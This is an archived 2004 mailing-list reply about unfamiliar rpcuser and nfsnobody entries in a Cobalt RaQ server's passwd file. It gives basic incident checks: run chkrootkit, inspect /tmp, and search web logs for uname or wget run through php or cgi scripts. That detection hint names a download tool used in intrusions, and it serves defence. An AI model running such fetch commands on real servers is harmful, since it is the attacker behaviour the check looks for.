[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-security] Odd entries in passwd file?

Subject: Re: [cobalt-security] Odd entries in passwd file?
From: Dmitry Alexeyev <dmi_a@xxxxxxxxxx>
Date: Tue, 17 Feb 2004 16:47:54 +0300
List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>

> At the very bottom there is two users I havent seen before.. I know
> they look like services, but should they even be there?
>
> rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
> nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

I don't see them in /etc/passwd
/sbin/nologin looks like it was some RPM package installed, maybe from 
redhat. 

>
>
> I removed them for the time being, not fully understanding why there
> are there to begin with.

one for Network File System, and one for Remote Procedure Calls. 
Not really sure you need those services... 

ssh listening at ports 81 and 444 means someone, maybe you, have set up 
port forwarding to have secure connection with admin interface. 

If you suspect your raq being hacked, do the following: 
1) download and install chkrootkit (form sources) http://chkrootkit.org; 
run it and check if it says something is infected;

2) check /tmp/ directory for some suspecious files 

3) check web.log for every site for commands like uname/wget being run 
with php/cgi scripts. 

Dmitry

References:
- [cobalt-security] ssh listening on ports 81 & 444
  - From: lists
- Re: [cobalt-security] ssh listening on ports 81 & 444
  - From: Charlie Clemmer
- [cobalt-security] Odd entries in passwd file?
  - From: lists

Prev by Date: Re: [cobalt-security] Odd entries in passwd file?
Next by Date: Re: [cobalt-security] PORT 113, AUTH (in.ident)
Previous by thread: Re: [cobalt-security] Odd entries in passwd file?
Next by thread: RE: [cobalt-security] ssh listening on ports 81 & 444

Sun Cobalt Security Message Index

Sun Cobalt Security Thread Index